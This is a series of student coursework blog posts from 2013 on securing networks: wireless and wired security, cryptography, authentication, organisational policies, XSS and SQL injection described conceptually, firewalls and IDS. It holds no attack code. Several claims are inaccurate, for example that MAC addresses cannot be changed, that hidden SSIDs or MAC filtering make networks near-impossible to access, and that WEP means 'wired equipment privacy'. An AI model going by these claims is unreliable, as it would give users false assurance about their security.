Thursday, 20 June 2013

M3 - Report on the similarities and differences between securing wireless and wired networked systems.


When using a wired network, it is extremely difficult for an attacker to intercept your connection and steal bandwidth, whereas when using a wireless connection others can see and potentially access your wireless network, sometimes within seconds, enabling them to use your bandwidth and steal any information that is shared over the network. Wireless signals can be picked up from somebody in a neighbouring building or sitting in a car near your house, which is why they can be so unsecure. To make the problem worse some routers get delivered with encryption disabled, meaning anybody can connect to the network without having to enter a password, most homeowners don’t know that they need to enable anything leaving them very vulnerable.
The good news is that it is not very hard to make your wireless network secure, which will both prevent others from stealing your internet and will also prevent hackers from taking control of your computer through your own wireless network. Changing the SSID will make it harder for hackers to find out what router you have, if you leave the SSID as “BtHomeHub-4106” Then any attacker will be able to see you have a Bt HomeHub, they can then try the default admin password and could gain access to your routers admin settings. You can even turn SSID broadcasting off, meaning when a user searches for a wireless network, yours will not appear. You can then connect to your network manually by supplying the SSID name. The most popular method of securing a wireless network is using encryption such as WEP, WPA, or WPA2. WPA2 is the most commonly used type of encryption as it is the most secure and most updated version. Using encryption will mean that anybody trying to connect to your network will have to enter a passphrase, without the unique passphrase they will be denied access to the internet, therefore making your network more secure. This however can still be bypassed my skilled attackers, to make encryption even more secure, it is important to change the default passphrase so it is 100% unique, this is because attackers can sometimes crack default passphrases and still gain access to your network. Ensure you change the passphrase to something very secure; you can do this by making it long and including characters, numbers and symbols.
The most effective and secure method is by disabling DHCP, meaning your router will not automatically assign IP addresses to anybody that wants to connect to the network. Instead you can assign static IP addresses and give the router a list of MAC addresses. This means that only the computers you have listed are able to connect to the network, making it virtually impossible for an attacker to gain access to your network, unless they physically break in and use your own computer. Putting your router in the middle of you house, rather than next to a window will also help make it secure, this will mean that anybody outside of your house will have a poor connection if they do manage to connect to your network.
Wired networks are generally considered more secure, this is because to gain access to the network you need to be physically connected via a wire. They are not however completely safe, there are a number of things you can do to ensure your network stays secure. The main obvious one being the physical security, keeping server roomed locked and only allowing access to authorised members of staff will greatly decrease the chance of a security breach.
Using a shielded cable is another good method of keeping your wired network secure, if you use and unshielded cable somebody could place a tapping device on the cable and pick up all data flowing through it, therefore accessing your data. Having cables on show is another security risk, it is best to keep them on the ceiling or somewhere out of reach or even underground. IPSec (Internet Protocol Security) is a set of protocols developed to support secure exchange of packets at the IP layer. When communicating over the network having IPSec will ensure the packets of data are not tampered with. Having a strong security policy and training staff properly so they are aware of the risks should also prevent any security breaches.
Using security tools and applications to monitor the network will help secure both wired and wireless networks; applications that could protect the networks include IDS, proxies and firewalls to restrict user usage and other things.
It is ideal to have physical security for both wired and wireless networks; this is like the first line of defence for the network. If someone gains access to the physical network they will be able to do a lot of damage. Also having firewalls, IDS and anti-virus is recommended for both types of network. Keeping the operating system and all applications up to date is also very important, this might help the software run faster and detect any new viruses or security threats.

Tuesday, 28 May 2013

D2 - Compare the security benefits of different cryptography techniques.


Symmetric Cryptography
A Symmetric Key Algorithm is an encryption system in which the sender and receiver of a message share a single, common key that is used to encrypt and decrypt the message. The key can be a number, a word or just a string of random characters. This key is applied to a message to change the content  and make it unreadable. This key could be as simple as reversing every word so it is written backwards. It acts as a password so only the sender and receiver can decrypt and read the message. Symmetric Key Systems and very simple and fast, although the main disadvantage of using this method is that you have to share the key with the receiver somehow, meaning anyone could get hold of it and decrypt your messages.

Stream Cipher & Block Cipher

A stream cipher is a type of symmetric encryption, they are designed to be exceptionally fast, much faster than any block cipher. Block ciphers operate on large blocks of data, whereas stream ciphers encrypt each plaintext digit one at a time with the corresponding digit of the keystream, to give a digit of the ciphertext stream. The encryption of plain text when using a block cipher will always result in the same ciphertext when the same key is used, whereas with a stream cipher, the transformation will vary, depending on when they are encountered during the encryption process.

Asymmetric Cryptography 

Asymmetric Encryption is a method that uses two keys:
  • A Public Key - Visible to everyone
  • A Private Key - Secret, Only visible to the recipient of the message.
When the CEO wants to send a secure message to one of his employees, the CEO will use the employees public key to encrypt the message. This message can then only be decrypted using the employees private key, which only the employee knows. The public and private keys are related in such a way that only the public key can be used to encrypt messages and only the corresponding private key can be used to decrypt them. This method is very secure and quite simple to use, a slight disadvantage of this method is that you need to know the recipient's public key to encrypt a message, this means the organisation will need a registry of all public keys, this is stored on a server.

DES Encryption

DES is short for Data Encryption Standard, this is a encryption method that was originally developed in 1975 and standardised in 1981. DES uses a block cipher method, this means it encrypts data in blocks rather than encrypting individual characters. The key size is 64 bits, although 8 bits of they key are used for parity (Error detection), which makes the effective DES key size 56-Bits.This method is now very outdated and 56-bit key length is considered very weak.

Triple DES

Triple DES or 3DES involves repeating the DES algorithm in an attempt to make the message more secure. Using this method you use two or three different keys to make the text unreadable. 3DES can work in different modes, the mode chosen dictates the number of keys. The different modes are:
  • DES-EEE3 - This uses three different keys for encryption, and the data is encrypted, encrypted, encrypted.
  • DES-EDE3 - This uses three different keys for encryption and the data is encrypted, decrypted, encrypted.
  • DES-EEE2 - This uses two different keys and the first and third encryption processes use the same key.
  • DES-EDE2 - This is the same as DES-EDE3 but only uses two keys, the first and third encryption processes use the same key.
Hashing
Hashing is when you generate a number from a string of text. The hash value is much smaller than the text itself, and is generated by a formula in such a way that it is extremely unlikely that some other text will produce the same hash value. For example if John wants to send a message to Nathan, John would calculate a hash value for the message and attach it to the message itself. When Nathan receives the message, he will perform the same hashing function and compare the result with Johns. If the two values are the same, Nathan knows the message was not altered during transmission. If the values are different, Nathan will know the message has been tampered with and he would delete the message. 

Digital Certificate 

A Digital signature is a hash value that has been encrypted with the sender’s private key. Forging a digital signature is impossible, this means by using a signature you are eliminating the possibility of an imposter signing the document. By having a digital signature you are proving the message is from you and therefore reassuring the recipient the document is valid and it does not contain false information. 

M2 - Suggest how users can be authenticated to gain access to a networked system

Different Types of Access Security

Identification - This is when somebody says who they are.

Authentication - This is when somebody proves they are who they say they are, this is usually through some form of ID, i.e. Passport or Driving License.  


Authorisation - This is when somebody gives you permission to do something.


Two Factor Standard Of Authentication
Two factor standard of authentication is when two different types of proof is necessary. For example when withdrawing money from an ATM you would need a valid debit card and the corresponding PIN number. Two factor standard of authentication is better and far more secure than one factor standard authentication because it requires the attacker to gain two different types of authentication which is much harder than finding out just one. 

Username/Password
This method requires the user to provide a valid username and corresponding password, if either of these is incorrect they will be denied access. This is a good method of authentication because it requires two pieces of confidential information, which can both be updated and changed regularly to keep the account secure. An advantage of using this method of authentication is that there is nothing physical that an attacker can steal, such as an ID card or key. However, a disadvantage of this method is if an attacker got hold of your password (either through a keylogger or by looking over your shoulder, for example.) it would be very easy to gain access to your account.

Biometrics Authentication
Biometrics is a very unique method of authentication, this is because it can either make decisions based on the users behaviour or their physical attributes. I.e fingerprints, Retina Scan, Palm scan. These are all things an attacker can not physically steal or easily forge, which is what makes this method so secure. The disadvantages of this method are that it is very expensive to set up and maintain and it can also be more time consuming than simply entering a password.


Digital Certificate
A digital certificate is an attachment put on an electronic message as a method of authenticating the person sending the message. The certificate must be obtained through a recognized certificate authority. It basically means when someone is sending personal information it is encrypted, this is important for information such as credit card numbers etc when making online purchases. The information is then decrypted once it has been sent via the digital certificate. The main advantage of this being when a user is entering confidential information they know they can trust the website. One of the disadvantages is that it can be expensive to maintain.




P3 - Explain what an organisation can do to minimise security breaches in networked systems

Policies and Procedures

Security Policies
A security policy is a document containing the rules and regulations regarding computer network access within an organisation. The purpose of the security policy is so that all the users within the organisation have a set of rules to follow and also so the organisation can protect their devices. The security policy will be constantly changing and being improved because over time they will discover more and more things they have missed out. It is important to have a security policy in place so that all of their data is secure and can only be accessed by authorised people.

Education and training
All organisations should have policies in place regarding education and training, this is to ensure all colleagues are able to use the latest software and are aware of the latest and best techniques to use when working on the organization's network. If a colleague regularly uses a piece of software, and a 2013 version is released with new helpful features, training all of your colleagues to use the latest version will cost you money, but in return it will theoretically enable them to produce work faster and easier than before. 

Backup
All organisations should have very clear policies regarding backup. In most IT organisations a backup is taken at the end of each day to ensure all work completed that day can not be lost. Usually at the end of each month all backups are checked to ensure they are being taken correctly. Backups are essential in any organisation to ensure no important files are ever lost.

Monitoring
Organisations should have policies in place regarding computer monitoring for all employees. Monitoring refers to watching an employees screen to ensure they are not doing anything they are not meant to be doing, and that they are getting on with their work as they should be. Random monitoring should take place at various times to ensure that the network stays secure and no employees are trying to do anything they shouldn't be.

Access permissions
Access permissions are a list of rules stating what things a user is able to do on their computer, for example some people may have access to more data than others. Every employee working for the organisation will have a set of access permissions unique to them, although usually it is done in groups, for example managers will have access to more than a regular employee would have access to.

Clarification of User Responsibility



Password Policy
A password policy will dictate what an employee is allowed to have as their password, for example how many letters it should contain and whether or not it should contain numbers and characters. The policy will also state that the password has to be changed every so often, usually around every 6 weeks. This is to ensure the network stays secure at all times. Password policies are designed to keep all employees accounts safe and make it harder for an attacker to gain access to the network.

Data Protection Policy
A data protection policy will control how personal information is used by the organisation, they will have to follow strict rules called ‘data protection principles’ to ensure personal data is used and lawfully and they abide by the data protection act.

Software Installation
Employees cannot install any software they like on the organization's computers, this is because software could contain harmful files such as viruses that could access the network and the corrupt sensitive data. When an employee needs to use a piece of software they will have to apply to get it installed on their PC.

Internet use policy
an internet use policy will list the do's and don'ts when using the internet at work, for example employees are not allowed to access the internet for personal use i.e social networking. They must only access the internet if it is work related.

Continuous Professional Development (CPD)
It is important to ensure that every member of staff working for your organisation has up to date knowledge regarding security threats. Organising training sessions is important to ensure your network stays secure. Your organisation should have a policy regarding CPD for IT professionals.

Physical Security
Organisations need to physically secure their computer systems, there is no point spending time and money preventing hackers from gaining access to your network when somebody could easily walk into the office and sit down at one of your physical computers connected to the network. There are a few methods you could use to physically secure your network:

Lock and Key - Using a lock and key is a good method because only the keyholders will be able to gain access, the disadvantage of this method however, is that the key could be stolen and used by anybody.


CCTV/Security Guards - Using cameras and security guards would be a very good method to use as it is very secure and will be harder for an attacker to bypass. The disadvantage of this method is that it is by far the most expensive as you will have to pay the guards a salary.


Logging of entry - This is a secure method that will only allow card holders onto the organization's premises, however it shares the same disadvantage of the lock and key method where anybody can steal a card and use it to gain access.


Biometrics Authentication - This method allows access based on physical attributes. I.e fingerprints, Retina Scan, Palm scan. These are all things an attacker can not physically steal or easily forge, which is what makes this method so secure. The disadvantages of this method are that it is very expensive to set up and maintain and it can also be more time consuming than simply entering a password.


Risk Assessment and Penetration Testing

Risk assessment takes place to assess what risks there are in the workplace, for example broken chairs, loose cables and other health and safety issues.Penetration testing is when the company hires an ethical hacker to try and gain access to their network, if the hacker is able to break their system they will then be able to fix it and improve their security.

Wednesday, 27 March 2013

D1 - Discuss Recent Network Threats

Cross-Site Scripting (XSS)
Cross-Site Scripting is a computer security vulnerability that is mostly found in web applications. XSS allows attackers to inject client-side scripts into web pages that are then viewed by others. The people that view this web page can then be infected without even knowing as the page appears to be normal. Depending on what scripts the attacker uses the effects can range from something very minor to a major security risk. XSS can be used to gain control and bypass the authorisation process.


SQL Injection
SQL Injection is a technique used to attack data driven applications and is implemented by adding parts of SQL statements in to entry fields within a website.This is done in an attempt to get the website to accept a newly formed rouge SQL command to the database. SQL injection is a code injection technique that exploits a security vulnerability in an applications software. The vulnerability occurs when the user input field is incorrectly filtered. SQL commands can change database content or allow the hacker to access database information such as credit card details or passwords. To prevent this type of attack all entry fields must be correctly filtered to disallow any scripts running.


Google Hacking
The Google Hacking Database (GHDB) is a database of queries that can identify sensitive data. Google does try and prevent hackers from gaining access to this information but it is still possible to do so. Using this information hackers can essentially see a list of websites that may be vulnerable to attack. The database contains information such as log in portal pages, passwords and sensitive directories.

Recent Security Breaches

Twitter
On The 1st of February 2013, Twitter announced it had been subjected to unauthorised access attempts over the course of a week. Attackers were trying to gain user account
information such as usernames, email addresses, session tokens, and encrypted versions of passwords. Twitter said approximately 250,000 users accounts were breached including those of corporate employees and reporters. Twitter said the attack was not the work of amateurs, and the methods used were extremely sophisticated.  


Yahoo
In July 2012, Yahoo announced that over 450,000 email addresses and passwords had been stolen from the companies database and posted publicly online. It was later discovered that Yahoo stored these usernames and passwords without any encryption at all, making them very easy for a hacker to get hold of. As well has having their email account compromised, Some Yahoo customers later realised there were even more problems as many of the hacked usernames and passwords were identical to those used in other website accounts, such as PayPal or online banking accounts.

Tuesday, 19 March 2013

M1 - Explain The Operation Of Different Intruder Detection Systems

Firewalls
Firewalls are designed to prevent unauthorised access to a computer or network. You can implement a firewall in both hardware and software, or a combination of both. A firewall will monitor data packets coming in and out of the network it is protecting and will enforce the company's network security policy. It filters out the packets that look suspicious and do not meet the specified security criteria. Most organisations use firewalls to protect their network from the Internet.
There are a few different types of firewall, these are:
  • Packet Filtering Firewall
  • Stateful Inspection Packet Filtering Firewall
  • Proxy Firewall
Packet Firewalls
Packet filtering was the first type of firewall to be created, a packet filtering firewall will control what data can flow into and out of a network. It will accept or reject packets of data based on a set of user-defined rules, these rules are called ACLs. ACLs are lines of text that the firewall will apply to each packet of data it receives, these lines of text provide specific information defining what packets can be accepted, and what packets must be denied. The main advantage of using a packet filtering firewall is that they are very flexible, you can easily customise the firewall and allow it to work with many different protocols and applications. Another advantage is that they are not application-dependant and they are capable of working at high speeds because they do not carry out extensive processing on the data packets. However, there are a few disadvantages of packet filtering firewalls. Due to the small number of variables used in access control decisions, they are susceptible to security breaches caused by improper configurations and they also cannot prevent attacks that employ application-specific vulnerabilities.

Stateful Firewalls
Stateful inspection packet filtering tracks each connection travelling across the network. The firewall is programmed to remove packets that come from an unknown connection, only the packets that come from a known, trusted connection will be allowed through the firewall. Stateful inspection firewalls will maintain a state table that will keep track of all the communication channels, filtering decisions are based not only on user-defined rules (as in packet filtering) but also on context that has been established by prior packets that have passed through the firewall.

Proxy Firewalls
Proxy firewalls are very secure, this does however come at the expense of speed and functionality. Proxy firewalls are secure because unlike other types of firewall, data packets don't pass through a proxy; instead, the proxy acts as a mirror and makes a new network connection based on the request. This prevents direct connections meaning it is harder for attackers to discover the location of the network. When the proxy firewall receives the request it first looks it over for suspicious information before allowing that data to reach the protected network. The advantages of using proxy firewalls are that it is the most secure type there is, they look at information within the packets up to the application layer and they also break the connection between trusted and untrusted systems. There are however a few disadvantages, proxy firewalls can only support a limited number of applications, they generally degrade traffic performance and slow the network down and the breaking of untrusted connections can be bad for functionality.

HoneyPots
This is a system where a server would be set up in the screened subnet or demilitarised zone in an attempt to lure attackers to it. This server would be set up separately from the actual server and will hold dummy information, this will trick the attacker into thinking they have found the organisations actual server. To make this server attractive to attackers the organisation would leave some ports open that are popular to attack. To help make the HoneyPot more realistic the server would contain some security software, this software will be easy enough to get through but will still reassure the attacker they have found the correct server.

While the attacker is trying to gain access to the dummy server the organisation can monitor what the attacker does so that they can prevent future attacks to the real server and improve overall security. Some administrators may even use detailed logs to gain the identity of the attacker and either attack back or notify the police.

Intrusion Detection System (IDS)
Intrusion detection systems are used to detect unauthorised entries and alert an administrator to respond. An IDS inspects all inbound and outbound network activity and identifies suspicious patterns that may indicate a network or system attack from someone attempting to compromise a system.


Network Based IDS (NIDS) & Host Based IDS (HIDS)
Network based systems work by separately analysing the packets that flow through the network, this helps to find malicious data packets that could otherwise get into your system due to them being overlooked by the firewall. Whereas in host based systems the IDS will watch over the activity's on each individual system or host.

Passive & Reactive IDS
Passive intrusion detection systems will look out for potential security threats and log all of this information, it will then signal alerts to the network administrator so that they can respond accordingly  Reactive IDS will respond to the suspicious occurrences by logging the user being attacked off or by actively reprogramming the firewall to block all traffic from this source which will stop further contact with the untrusted source.

Knowledge Based IDS
The majority of intrusion detection systems that are widely used are knowledge based. A knowledge based IDS applies accumulated knowledge about specific attacks and system vulnerabilities. Since the IDS knows about the vulnerabilities it will look out for attempts to expose them, if an attempt is made an alarm will be triggered and the network administrator will be notified. An advantage of this type of IDS is that it has a low false alarm rate, meaning if the administrator is notified they know they need to respond straight away. There are however a few disadvantages, one being that it  is difficult to gather information about known attacks and the system will need to be constantly kept up to date, this will take a large amount of time.

Behaviour Based IDS
This type of IDS will assume that an intrusion can be detected by monitoring unexpected activity and behaviour on the system. The system will compare current activity to previous behaviour, if an abnormality is discovered an alarm will be raised. The advantages of this type of IDS are that they detect attempts to exploit vulnerabilities, they are able to contribute to the discovery of new attacks and they also help detect 'abuse of privileges' attacks. The main disadvantage to this type of IDS is that there is a high false alarm rate.

Tuesday, 5 March 2013

P2 - Describe How Networked Systems Can Be Protected

Emails are a very good method of communication; they do however have the potential to be harmful to a network. 

Spam Guard
Spam is one of the most common email security risks. Spam involves identical emails being sent to hundreds of thousands of people in the hope that a small percentage of the recipients will open them and be interested in them. The majority of spam emails are sent to advertise a product or service; however some of these emails may contain viruses or links to phishing websites. Roughly 130 billion spam emails are sent every day, this is why it is vital that you protect your organisation against it. In addition to wasting people’s time with unwanted email, spam also uses up a lot of network bandwidth slowing the whole network down. Spammers collect email addresses from chat rooms, websites, customer lists, newsgroups, and viruses which harvest users' address books, and are sold to other spammers. Sending the emails costs the spammer nothing, so even if only one person looks at the email and buys their product they are making money. Spam guards are usually already installed on the server, for example if you use an email application such as 'Gmail' or 'Hotmail' they will already have a spam guard installed. The user configures the spam guard by marking emails as spam, every time a user does this the spam guard will update itself so the next time they receive a similar email it will automatically go into the spam folder.

Hoaxing
Hoaxing is another possible risk regarding email. Hoaxing is the act of sending fake emails to a number of recipients in an attempt to phish them. For example an attacker would send an email to somebody claiming to be their bank, asking for their personal account details. The attacker would make the email appear to be from the recipient’s bank by changing the email address; this is usually done either on a website or using specialist software. The user will look at the email address and trust the information within the email. Usually the Spam Guard will remove most hoax emails, but some emails may still get through. This is why it is a good idea to configure your organisations email server to use a MIME protocol; this is a secure email protocol that checks the identity of the sender, therefore removing any hoax threats.

Secure MIME
As mentioned above, secure multi-purpose Internet mail extension is a widely used method of securing emails. This protocol will encrypt all incoming and outgoing emails which is vitally important for any organisation that may be exchanging sensitive information. 

WEP & WPA
WEP is short for wired equipment privacy; it is a method of encrypting data over IEEE 802.11 wireless networks. WEP is designed to provide the same level of security as wired LAN networks. Wireless networks are broadcast using radio waves meaning they are more vulnerable to tampering. WEP is a very weak method of encryption so data can be intercepted quite easily. WPA stands for Wi-Fi protected access, it is another method used to secure wireless networks. WPA was designed to work with existing Wi-Fi products already configured with WEP and improve upon WEPs security features. 

MAC Association
MAC association is another method of securing a network; you set up MAC association by providing the DHCP server with a list of all of the computers MAC addresses you want to be able to access the network. This means only the computers with one of the given MAC addresses will be able to access the network. You cannot change your computers MAC address meaning it would be very difficult for an attacker to access your network.

Wireless Access Point ID
Securing your wireless access point is vital; if you don't secure it somebody may be able to access any incoming and outgoing data. One simple way that you can make it more secure is by changing the SSID (Router Name). This is because if you leave your SSID as "BTHomeHub352" the attacker will know you have a BT homehub; they can then try a list of common default passwords and may be able gain access to your network. Another very good method of securing your access point is hiding it; this means when somebody searches for Wi-Fi, your router will not appear on that list making it very secure.

Shielded Cable
Using shielded cable can provide more security, this is because when using an unshielded cable, an attacker would be able to place a tapping device on the cable and gain access to any data flowing through that cable. A shielded cable will provide an extra layer of protection meaning the attacker would not be able to listen in.

Personal Access Control
There are many methods of access control, these are:
  • Something you know - Such as passwords, PIN numbers etc. This is the most common type of access control although it certainly isn’t the most secure. Anybody can potentially guess a password using specialist software.
  • Something you have - Such as an ID card. This is a secure method as you will need the card to gain access; although the card can also be lost meaning anybody could gain access.
  • Something you are - Such as fingerprints. For example if you had to provide a fingerprint to gain access to the server room it would be extremely secure because only authorised people would be able to.
Encryption
Encryption is the most effective way to secure data. Encryption is basically converting the data into an unreadable format; you will then need a secret key or password in order to decrypt it. When sending data, it will be encrypted before it is sent and then decrypted when it is received by the other user.